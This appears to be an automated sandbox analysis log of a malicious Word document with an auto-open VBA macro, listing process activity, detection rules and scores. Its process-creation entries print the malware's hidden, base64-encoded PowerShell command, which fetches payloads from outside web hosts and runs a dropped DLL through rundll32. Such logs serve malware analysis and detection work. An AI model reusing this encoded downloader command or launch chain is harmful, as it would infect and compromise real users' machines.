                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004173AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_00416DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_004161B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002BA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002ABB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B0D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B0F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B7D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B7F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B5D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B8D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B2B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B0B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B1773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B2349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B8F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B9B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B73AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B6DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B61B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B9586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002AD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B67E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B71EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B31E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B3FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002B1BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 12_2_002A9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B3895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B02C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B42DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B4B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B63C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B7A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B5A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002AE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002BA0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B12E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B26F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002A96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B20C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002B8ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_002ABB3A
                      Source: bestand-8881014518 00944.docOLE, VBA macro line: Private Sub Document_open()
                      Source: VBA code instrumentationOLE, VBA macro: Module Wm_t404p8v_, Function Document_open
                      Source: bestand-8881014518 00944.docOLE indicator, VBA macros: true
                      Source: 00000005.00000002.2092921880.0000000000366000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: 00000005.00000002.2092945570.0000000001B86000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
                      Source: O_5Z.dll.5.drStatic PE information: Section: .rsrc ZLIB complexity 0.994955920298
                      Source: rundll32.exe, 00000006.00000002.2101148433.0000000001BC0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2095917337.0000000000910000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                      Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@34/8@1/1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10002D70 SysAllocString,CoCreateInstance,PropVariantClear,SysFreeString,SysFreeString,
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$stand-8881014518 00944.docJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCE75.tmpJump to behavior
                      Source: bestand-8881014518 00944.docOLE indicator, Word Document stream: true
                      Source: bestand-8881014518 00944.docOLE document summary: title field not present or empty
                      Source: bestand-8881014518 00944.docOLE document summary: edited time not present or 0
                      Source: C:\Windows\System32\msg.exeConsole Write: ............L........................... .........................&.....H.&.............#...............................h.......5kU.......&.....
                      Source: C:\Windows\System32\msg.exeConsole Write: ............L...0...............A.s.y.n.c. .m.e.s.s.a.g.e. .s.e.n.t. .t.o. .s.e.s.s.i.o.n. .C.o.n.s.o.l.e.........&.....L.................&.....
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................................................`I.........v.....................K......(.U.............................
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............................0...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j..... ..............................}..v....(.......0...............(.U.............0...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j....................................}..v............0...............................0...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v.......................j......U.............................}..v............0.................U.............0...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............]..j....................................}..v....(.......0...............................0...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....#...............]..j..... ..............................}..v............0.................U.............0...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....'...............m..j....E...............................}..v...../......0.................U.............0...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................y=.v....+...............m..j....E...............................}..v....Xn......0.................U.............0...............
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\msg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: bestand-8881014518 00944.docVirustotal: Detection: 31%
                      Source: bestand-8881014518 00944.docReversingLabs: Detection: 47%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsA
                      Source: unknownProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAA5ADUAWABVAGMARAAgACAAPQAgACAAWwBUAFkAcABFAF0AKAAiAHsAMAB9AHsAMgB9AHsANAB9AHsAMwB9AHsAMQB9ACIAIAAtAGYAJwBTAFkAUwBUAGUAJwAsACcAQwBUAE8AUgB5ACcALAAnAE0AJwAsACcAUgBFACcALAAnAC4AaQBvAC4AZABJACcAKQAgACAAOwAgACAAcwBFAFQALQBJAHQARQBtACAAIAAoACcAVgAnACsAJwBhAHIAaQBBAEIATABlACcAKwAnADoARgBJAFUAJwApACAAIAAoACAAIABbAHQAeQBwAEUAXQAoACIAewAxAH0AewA0AH0AewAwAH0AewA2AH0AewA1AH0AewAzAH0AewAyAH0AIgAgAC0AZgAnAE0ALgBuAEUAVAAuAFMAZQBSACcALAAnAHMAWQBzAHQAJwAsACcAVABNAGEATgBBAEcAZQByACcALAAnAE4AJwAsACcARQAnACwAJwBJACcALAAnAHYASQBjAEUAUABvACcAKQApADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACcAUwBpACcAKwAoACcAbABlACcAKwAnAG4AJwApACsAKAAnAHQAJwArACcAbAB5AEMAJwApACsAKAAnAG8AJwArACcAbgB0ACcAKQArACgAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABIAGMANgBjADYAdQB5AD0AJABJADcANgBDACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABUADMANgBTADsAJABWADAANgBCAD0AKAAnAEkAMwAnACsAJwA5AEgAJwApADsAIAAgACgAZwBjAEkAIAAoACIAVgBBACIAKwAiAHIAaQBBAEIAIgArACIAbAAiACsAIgBFADoAOQA1ACIAKwAiAFgAdQBDAGQAIgApACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAUgBlAGEAVABgAEUAZABgAEkAUgBgAEUAYABDAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBDADMAcgBlACcAKwAnADUAYwAzAHsAMAB9ACcAKwAnAEQAaQAnACsAJwBfAHAAJwArACcAMwAnACsAJwBjADkAJwArACcAewAwAH0AJwApAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAEQAMQA1AEIAPQAoACgAJwBHADIAJwArACcAOAAnACkAKwAnAE8AJwApADsAIAAkAGYAaQB1ADoAOgAiAHMAZQBgAGMAYABVAHIASQBUAFkAcABSAG8AVABPAGAAYwBPAEwAIgAgAD0AIAAoACgAJwBUACcAKwAnAGwAcwAnACkAKwAnADEAMgAnACkAOwAkAFIAMwAyAEYAPQAoACcARwAnACsAKAAnADEANgAnACsAJwBaACcAKQApADsAJABDADcAegBpADkAdQB1ACAAPQAgACgAJwBPACcAKwAoACcAXwAnACsAJwA1AFoAJwApACkAOwAkAFcAXwAxAEQAPQAoACcARQAnACsAKAAnADEAOQAnACsAJwBUACcAKQApADsAJABXADcAaQBvADAAdwBnAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0AJwArACgAJwBDACcAKwAnADMAcgBlADUAJwApACsAJwBjADMAJwArACcAewAnACsAJwAwAH0ARABpAF8AcAAzAGMAJwArACcAOQB7ACcAKwAnADAAfQAnACkALQBGAFsAQwBoAGEAcgBdADkAMgApACsAJABDADcAegBpADkAdQB1ACsAKAAnAC4AZAAnACsAJwBsAGwAJwApADsAJABIADMANgBBAD0AKAAnAFIAJwArACgAJwA2AF8AJwArACcATwAnACkAKQA7ACQARwByADYAeABfAGgAXwA9ACgAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKwAnADoALwAnACkAKwAnAC8AJwArACgAJwBwACcAKwAnAGUAdABhAGYAJwApACsAKAAnAGkAbABtACcAKwAnAC4AYwBvACcAKQArACcAbQAnACsAKAAnAC8AdwAnACsAJwBwACcAKQArACgAJwAtAGEAJwArACcAZABtACcAKwAnAGkAbgAnACsAJwAvADQAbQAvAEAAXQAnACkAKwAnAGEAJwArACgAJwBuACcAKwAnAHcAWwAzACcAKwAnADoALwAvAGcAaQAnACsAJwB2AGkAJwApACsAKAAnAG4AZwAnACsAJwB0AGgAYQAnACsAJwBuAGsAcwBkACcAKQArACcAYQBpACcAKwAnAGwAJwArACgAJwB5AC4AYwAnACsAJwBvAG0ALwBxAGwARQAvAFYAZQBGAC8AJwArACcAQABdAGEAJwArACcAbgAnACkAKwAoACcAdwAnACsAJwBbADMAOgAvAC8AdwAnACkAKwAoACcAYQBwACcAKwAnAC4AJwApACsAJwB6AGgAJwArACgAJwBvAG4AZwAnACsAJwBsACcAKQArACcAaQAnACsAKAAnAHMAYwAnACsAJwAuAGMAJwArACcAbwAnACsAJwBtAC8AdwBwAC0AaQBuAGMAJwApACsAKAAnAGwAdQAnACsAJwBkAGUAcwAnACsAJwAvAFEAcgAnACsAJwB5AEMAJwApACsAJwBCAC8AJwArACcAQAAnACsAKAAnAF0AJwArACcAYQBuAHcAJwApACsAKAAnAFsAMwAnACsAJwBzADoALwAnACsAJwAvAGYAJwArACcAbgAnACsAJwBqAGIAcQAuAGMAbwBtAC8AdwBwAC0AaQAnACkAK
                      Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\C3re5c3\Di_p3c9\O_5Z.dll Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vpdqbmffwwlyu\elrrcydsvvol.uui',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ygrfxgybds\jrwpxihfr.rob',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Lydzwviczteg\jfrrzuskryo.byz',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wmhtpvmxcctn\ytalpvmidll.mdf',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Grdxtrtyl\kmtzbbgl.dxh',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wgsitvbdu\kifteejg.dsr',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Extnaatd\rvydpsb.zwq',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Rvuszsgopfi\mtjvkbmtlk.dym',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Oqhzdezq\bectafh.dff',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Weiwdqzj\qfklela.qlk',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Vvjepckhx\flnsfzgm.bdf',Control_RunDLL
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ikstsciju\uxbijfvp.mja',Control_RunDLL
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD 